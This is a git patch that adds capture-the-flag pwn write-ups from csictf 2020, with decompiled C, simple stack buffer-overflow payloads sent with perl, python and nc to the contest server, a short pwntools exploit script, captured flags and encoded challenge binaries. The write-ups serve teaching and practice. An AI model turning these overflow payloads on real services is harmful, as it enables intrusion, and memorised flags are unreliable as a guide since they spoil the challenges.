From 88ee32973e77d92b99bab8e362f49f6b29030e90 Mon Sep 17 00:00:00 2001
From: rishitsaiya <rishitsaiya@gmail.com>
Date: Fri, 31 Jul 2020 18:24:27 +0530
Subject: [PATCH] Added Pwn Challenges

---
 Pwn/Global Warming/README.md          |  10 +++
 Pwn/Secret Society/README.md          |  84 ++++++++++++++++++++++++++
 Pwn/Secret Society/flag.txt           |   1 +
 Pwn/Secret Society/secret-society     | Bin 0 -> 17176 bytes
 Pwn/pwn intended 0x1/README.md        |  53 ++++++++++++++++
 Pwn/pwn intended 0x1/pwn-intended-0x1 | Bin 0 -> 16864 bytes
 Pwn/pwn intended 0x2/README.md        |  63 +++++++++++++++++++
 Pwn/pwn intended 0x2/pwn-intended-0x2 | Bin 0 -> 16864 bytes
 Pwn/pwn intended 0x2/rev_exploit.py   |  10 +++
 Pwn/pwn-intended-0x3/README.md        |  76 +++++++++++++++++++++++
 Pwn/pwn-intended-0x3/pwn-intended-0x3 | Bin 0 -> 16944 bytes
 11 files changed, 297 insertions(+)
 create mode 100644 Pwn/Global Warming/README.md
 create mode 100644 Pwn/Secret Society/README.md
 create mode 100644 Pwn/Secret Society/flag.txt
 create mode 100644 Pwn/Secret Society/secret-society
 create mode 100644 Pwn/pwn intended 0x1/README.md
 create mode 100644 Pwn/pwn intended 0x1/pwn-intended-0x1
 create mode 100644 Pwn/pwn intended 0x2/README.md
 create mode 100644 Pwn/pwn intended 0x2/pwn-intended-0x2
 create mode 100644 Pwn/pwn intended 0x2/rev_exploit.py
 create mode 100644 Pwn/pwn-intended-0x3/README.md
 create mode 100644 Pwn/pwn-intended-0x3/pwn-intended-0x3

diff --git a/Pwn/Global Warming/README.md b/Pwn/Global Warming/README.md
new file mode 100644
index 0000000..ed66f07
--- /dev/null
+++ b/Pwn/Global Warming/README.md	
@@ -0,0 +1,10 @@
+## Global Warming
+The main idea finding the flag is `%n` exploit.
+
+#### Step-1:
+
+https://github.com/crypt0n1te/Write-Ups/blob/master/csictf-2020/pwn/global-warming.md
+
+#### Step-5:
+Finally the flag becomes:
+`csictf{n0_5tr1ng5_@tt@ch3d}`
\ No newline at end of file
diff --git a/Pwn/Secret Society/README.md b/Pwn/Secret Society/README.md
new file mode 100644
index 0000000..c997748
--- /dev/null
+++ b/Pwn/Secret Society/README.md	
@@ -0,0 +1,84 @@
+## Secret Society
+The main idea finding the flag is Buffer Overflow.
+
+#### Step-1:
+After I downloaded `secret-society`, I reversed it with IDA, I got this source code:
+
+**main()** function:
+```c
+undefined8 main(void)
+{
+  size_t sVar1;
+  undefined8 local_d8 [2];
+  undefined4 uStack200;
+  undefined auStack196 [108];
+  char local_58 [56];
+  FILE *local_20;
+  char *local_18;
+  __gid_t local_c;
+  
+  setvbuf(stdout,(char *)0x0,2,0);
+  local_c = getegid();
+  setresgid(local_c,local_c,local_c);
+  memset(local_58,0,0x32);
+  memset(local_d8,0,0x80);
+  puts("What is the secret phrase?");
+  fgets((char *)local_d8,0x80,stdin);
+  local_18 = strchr((char *)local_d8,10);
+  if (local_18 != (char *)0x0) {
+    *local_18 = '\0';
+  }
+  sVar1 = strlen((char *)local_d8);
+  *(undefined8 *)((long)local_d8 + sVar1) = 0x657261206577202c;
+  *(undefined8 *)((long)local_d8 + sVar1 + 8) = 0x6877797265766520;
+  *(undefined4 *)((long)&uStack200 + sVar1) = 0x2e657265;
+  auStack196[sVar1] = 0;
+  local_20 = fopen("flag.txt","r");
+  if (local_20 == (FILE *)0x0) {
+    printf("You are a double agent, it\'s game over for you.");
+                    /* WARNING: Subroutine does not return */
+    exit(0);
+  }
+  fgets(local_58,0x32,local_20);
+  printf("Shhh... don\'t tell anyone else about ");
+  puts((char *)local_d8);
+  return 0;
+}
+
+```
+
+#### Step-2:
+So, basically I had to overflow 3 buffers in above code `local_d8 (16 bytes, our input buffer)`, `uStack200 (4 bytes)` & `auStack196 (108 bytes)`
+
+So I tried using Debugger to get the address of the flag.
+
+
+```bash
+echo flag > flag.txt
+perl -e 'print "A"x16 . "B"x4 . "C"x108' | ./secret-society
+```
+
+I got this output: 
+
+```bash
+What is the secret phrase?
+Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,flag
+```
+
+#### Step-3:
+So, we just have to run this remotely on the web server.
+
+```bash
+perl -e 'print "A"x16 . "B"x4 . "C"x108' | nc chall.csivit.com 30041
+```
+I got this output: 
+
+```bash
+What is the secret phrase?
+Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,csivit{Bu!!er_e3pl01ts_ar5_5asy}
+```
+Voila! I got the flag there.
+
+#### Step-4:
+Finally the flag becomes:
+`csivit{Bu!!er_e3pl01ts_ar5_5asy}`
diff --git a/Pwn/Secret Society/flag.txt b/Pwn/Secret Society/flag.txt
new file mode 100644
index 0000000..acf36e4
--- /dev/null
+++ b/Pwn/Secret Society/flag.txt	
@@ -0,0 +1 @@
+flag
diff --git a/Pwn/Secret Society/secret-society b/Pwn/Secret Society/secret-society
new file mode 100644
index 0000000000000000000000000000000000000000..0a7a2572255f4ef3ce71f30f7e757c5ce843db2b
GIT binary patch
literal 17176
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
DQyb2&

literal 0
HcmV?d00001

diff --git a/Pwn/pwn intended 0x1/README.md b/Pwn/pwn intended 0x1/README.md
new file mode 100644
index 0000000..75979a2
--- /dev/null
+++ b/Pwn/pwn intended 0x1/README.md	
@@ -0,0 +1,53 @@
+## pwn intended 0x1
+The main idea finding the flag is Buffer Overflow.
+
+#### Step-1:
+I reversed the file with Ghidra.
+
+```c
+undefined8 main(void)
+
+{
+  char local_38 [44];
+  int local_c;
+
+  local_c = 0;
+  setbuf(stdout,(char *)0x0);
+  setbuf(stdin,(char *)0x0);
+  setbuf(stderr,(char *)0x0);
+  puts("Please pour me some coffee:");
+  gets(local_38);
+  puts("\nThanks!\n");
+  if (local_c != 0) {
+    puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
+    system("cat flag.txt");
+  }
+  return 0;
+}
+```
+
+#### Step-2:
+Clearly, this was a case for Buffer Overflow.
+
+A simple command to overflow the buffer would give us the flag.
+
+`python -c 'print"A"*45' | nc chall.csivit.com 30001`
+
+<i> The piping done other way round doesn't help though. </i>
+
+Output:
+
+```bash
+Please pour me some coffee:
+
+Thanks!
+
+Oh no, you spilled some coffee on the floor! Use the flag to clean it.
+csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
+```
+
+Voila! There we have our flag.
+
+#### Step-3:
+Finally the flag becomes:
+`csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}`
\ No newline at end of file
diff --git a/Pwn/pwn intended 0x1/pwn-intended-0x1 b/Pwn/pwn intended 0x1/pwn-intended-0x1
new file mode 100644
index 0000000000000000000000000000000000000000..37b4fc9a121322413e8805b37bc470249f96f75f
GIT binary patch
literal 16864
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

literal 0
HcmV?d00001

diff --git a/Pwn/pwn intended 0x2/README.md b/Pwn/pwn intended 0x2/README.md
new file mode 100644
index 0000000..f40416c
--- /dev/null
+++ b/Pwn/pwn intended 0x2/README.md	
@@ -0,0 +1,63 @@
+## pwn-intended-0x2
+The main idea finding the flag is overwrite the correct hex after padding.
+
+#### Step-1:
+After I downloaded `pwn-intended-0x2`, I reversed it with IDA, I got this source code:
+
+```c
+undefined8 main(void)
+
+{
+  char local_38 [44];
+  int local_c;
+
+  local_c = 0;
+  setbuf(stdout,(char *)0x0);
+  setbuf(stdin,(char *)0x0);
+  setbuf(stderr,(char *)0x0);
+  puts("Welcome to csictf! Where are you headed?");
+  gets(local_38);
+  puts("Safe Journey!");
+  if (local_c == -0x35014542) {
+    puts("You\'ve reached your destination, here\'s a flag!");
+    system("/bin/cat flag.txt");
+  }
+  return 0;
+}
+```
+
+#### Step-2:
+`local_c` is checked for a hex value of `0xcafebabe`. Since the size of local array is 44, we have to write `0xcafebabe` after 44 bytes.
+
+#### Step-3:
+I wrote a very common `rev_exploit.py` to pwn into the machine.
+
+```python
+import pwn
+
+r = pwn.remote('chall.csivit.com', 30007)
+
+payload = "A"*44 + '\xbe\xba\xfe\xca'
+
+r.sendline(payload)
+r.interactive()
+```
+
+#### Step-4:
+When I finally ran this `python3 rev_exploit.py`, I got this output:
+
+```bash
+[+] Opening connection to chall.csivit.com on port 30007: Done
+[*] Switching to interactive mode
+Welcome to csictf! Where are you headed?
+Safe Journey!
+You've reached your destination, here's a flag!
+csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive 
+$
+[*] Interrupted
+```
+Voila! I got the flag there.
+
+#### Step-5:
+Finally the flag becomes:
+`csictf{c4n_y0u_re4lly_telep0rt?}`
\ No newline at end of file
diff --git a/Pwn/pwn intended 0x2/pwn-intended-0x2 b/Pwn/pwn intended 0x2/pwn-intended-0x2
new file mode 100644
index 0000000000000000000000000000000000000000..aaa5e4f905d70fa5660654a9d8a3a7fae4c9f135
GIT binary patch
literal 16864
zcmeHOeQX@X6`#Ayhk^KfG0+$Y%_fDCwD|0#5X?u&o?|;_>U@wm0n~=g`fkrY^?c{v
z?SYMGYnniNK)`DIM}?3I2vwHaKT=gfQU9Qc9ASYfH6YqXMW_J*by^A`Kt&Pc`g^nU
z&bxbODz&PrO8ZW`Z{Ba-do%lHc5h~P<~zLuec@0@Fong<f~2vSE+OYE#1l72QDI%;
z0-=k`#Y(XR$RZrN%pvZin2&^=4CYNrF9J?>(<*;DtV1GMCkD?BG3Oc*C%bvlRnp;I
zR3Q*^5p!g+TTDqM3w3?W?^pF;&U&@-G%^Nhx@63!RmGUQ?POKrj=H#6*(sh><xMHh
zb|jKrOxeYhKJyc*JmwrviU}RZmA~U*9TLepG0`K>^PF^vcD`w+DSc2QiMa0JH%Und
z=4^K>>{O_g#%D7Q`z}?USRgKf<Ds~^T+xxs4sE=qBbRQ^W%K3n_VKQb?HjL&mkRL>
z^13fV@zkfbZr>v|zj<!Sk9Umy@cGt`UmSk)$TdH`?%>N*Z>j_NBOM~r=i(@R9uCTv
z*A>#lWGEIU?0g(V>n?wIWoC~VyZ-D$D;=c%OrEuRSeD(|0Ph6W2w%4Ve%%82H-T$7
z{B!|;M*b&(YdHLL8Gz-YP3+fonZ^C<Vug?S@HGmb^x*>Sm7?a^D26S&B*w}(mF#pj
zPv=6}CT10jqBK#mtx-|3?4fc-7zWuHCEG08#;6JHtpoktTZ|3y4e@J*(LcD&fR#0z
zg;8;E+m>7*Zw;D5ISZD<qlLV(G#u52iga0F^>f<akqD>ur{DZzqI_u<T_7y_Wv&pX
zHtRA)eT4Lw=3KaZ&ZvwtF5G>;eB{D8#$>{ACm+=Jm^ki)bAO~fjyvJh)=X`xJ(dCp
zGYGD^aO(3+Yh5_s<CNFw!pT=aK?H&b1Q7@#5JVt|KoEf-0{`C;c)#WIA14pI-IRQ2
z@oODIB=0|JhpQ)&2aY$*$P24p`#Rw2m2cqOvPwsa<Ppj{eX0t&@{c6bQ26u-DZfNA
z4LMIAmGTQD(@^vDVaQb8`oHy8Uc56|c|CdHjWat3`)7}iwdx`{drU|+yLUOtx%d{?
zeK1A(GnshHs)O(##MF@_2BgVNbha-<rB_0WD!ugA1XWMXWagErzRybi``(ePawd7~
zoz2N(A4QU(=aMg;voC>%vzUpJhi2s=)3T~Zh?$mElT;v;Ke=fiN)hD?_arNC&fSBn
zcy94mfrR$WO!><r{l7j)iim3GZ0{%J1f_g{Ql6FR%Iw_ixoQ>I88`Mz2YcI%{e-YX
zoAyVAm^&cTy(f~D*(2m<?kOiTN0}L<@B7v#&;IJ%3+2mUks<I_N8v%F9gF<{Wa{}D
zT%;3Fs&C@9fkT_#|FRH?z5SKnC-(GLK1>WIDxd609%_FB@a}<ipHd&0`|YQw&#_M<
z_Nw)-sQ3(2&JI-G>8boVQN8F-$pbT?<n^zX|3dxeYx@#kPwY$FnK0ZjlI@A=6PNw2
z*3;;s0tzA!L?DPj5P={9K?H&b1Q7@#5JVt|KoEidRs=%o>(FghE>#${G`pasO4*d1
zS*_hRf-h~FiDRNr)<!HdZKXGh-DbwpZYh+Dd23>|5O);HSKVc4MaxW$SZUHMYH6!v
zXY;0=E#$9;UD3L#q?uYKXAZ9x9YfiCN6NIN7`Ml5Tv+I`$c<g#^nL8{cdONV!QTcS
z1YdckTBWxQFM&S|e(!tL>T${kUxv31^xc;zbk8mk8jpo8Teh@m3OIf1rH`~z@I#Y#
z(X%v0SSOC31LJRWS5Ov?Hefr!MKsnIZM&uAg1eh0#pX+I{L)vhSVJ)R%HjAT>hUB2
